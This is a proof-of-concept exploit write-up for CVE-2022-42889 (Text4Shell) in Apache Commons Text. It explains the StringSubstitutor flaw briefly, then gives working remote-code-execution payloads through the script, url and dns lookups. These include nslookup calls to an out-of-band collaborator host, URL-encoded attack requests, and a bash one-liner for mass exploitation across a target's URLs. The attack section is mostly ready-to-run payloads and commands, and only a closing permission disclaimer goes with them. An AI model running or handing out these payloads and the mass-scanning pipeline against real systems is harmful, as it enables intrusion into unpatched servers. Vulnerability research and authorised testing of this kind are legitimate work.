Apache Commons Text – CVE-2022-42889 Text4Shell proof of concept exploit.

CVE-2022-42889 TEXT4SHELL RCE

Details:

CVE-2022-42889 affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10

Text4Shell has since been assigned a 9.8 (out of 10) severity rating by the National Vulnerability Database, meaning it falls into the “critical” category.

The vulnerability has been compared to Log4Shell since it is an open-source library-level vulnerability that is likely to impact a wide variety of software applications that use the relevant object. However, initial analysis indicates that this is a bad comparison. The nature of the vulnerability means that, unlike Log4Shell, it will be rare that an application uses the vulnerable component of Commons Text to process untrusted, potentially malicious input.

Technical analysis

The vulnerability exists in the StringSubstitutor interpolator object. An interpolator is created by the StringSubstitutor.createInterpolator() method and will allow for string lookups as defined in the StringLookupFactory. This can be used by passing a string “${prefix:name}” where the prefix is the aforementioned lookup. Using the “script”, “dns”, or “url” lookups would allow a crafted string to execute arbitrary scripts when passed to the interpolator object.

While this specific code fragment is unlikely to exist in production applications, the concern is that in some applications, the pocstring variable may be attacker-controlled. In this sense, the vulnerability echoes Log4Shell. However, the StringSubstitutor interpolator is considerably less widely used than the vulnerable string substitution in Log4j and the nature of such an interpolator means that getting crafted input to the vulnerable object is less likely than merely interacting with such a crafted string as in Log4Shell.

Exploitation

Remote Code Execution is possible because the payload flows into the StringSubstitutor.replace() or StringSubstitutor.replaceIn() methods.

${script:javascript:java.lang.Runtime.getRuntime().exec('CMD')}

final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
String out = interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/text4shell')}");
System.out.println(out);

In continuation of this article, we will demonstrate both manual and automatic ways to detect text4shell vulnerability.

Manual

In order to exploit the text4shell vulnerability easier and with more success we will split and describe the payload into a few parts.

${ } – Open and close brackets

script:javascript | url:UTF-8 | dns:address – Interpolators. script used to evaluate expressions using the JVM script execution engine, dns: used to resolve DNS records, url: used to request information from a URL.

java.lang.Runtime.getRuntime().exec – Java Class Runtime – Exec

('whoami') – Code execution part.

The reason why the command nslookup followed by the Out-of-Band (OOB)/Collaborator domain is used is easier to confirm the text4shell vulnerability. If the application is vulnerable, we will notice the DNS Query on our OOB domain.

Replace parameter value with payload:

script:javascript

${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

https://your-target.com/exploit?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

url:UTF-8

${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

https://your-target.com/exploit?search=%24%7Burl%3AUTF-8%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

dns:address

${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')} 

https://your-target.com/exploit?search=%24%7Bdns%3Aaddress%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d 

Mass exploitation

Simple bash one-liner which uses gau, ffuf and qsreplace.

https://gist.githubusercontent.com/kljunowsky/97479082f50cd9219e80258f698c4d26/raw/7e600767bc59483653a34f17bd426340f28bf086/text4shell-payloads.txt

${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

for payload in $(cat text4shell-payloads.txt|sed 's/ COLLABORATOR-HERE/SPACEid.burpcollaborator.com/g'); do echo TARGET.com | gau --blacklist ttf,woff,svg,png | qsreplace "$payload" | sed 's/SPACE/%20/g' | grep "java.lang.Runtime.getRuntime" >> payloads-final.txt;done && ffuf -w payloads-final.txt -u FUZZ

Please use it wisely. Scan targets you have permission to. Shift Security Consulting is not responsible for any damage.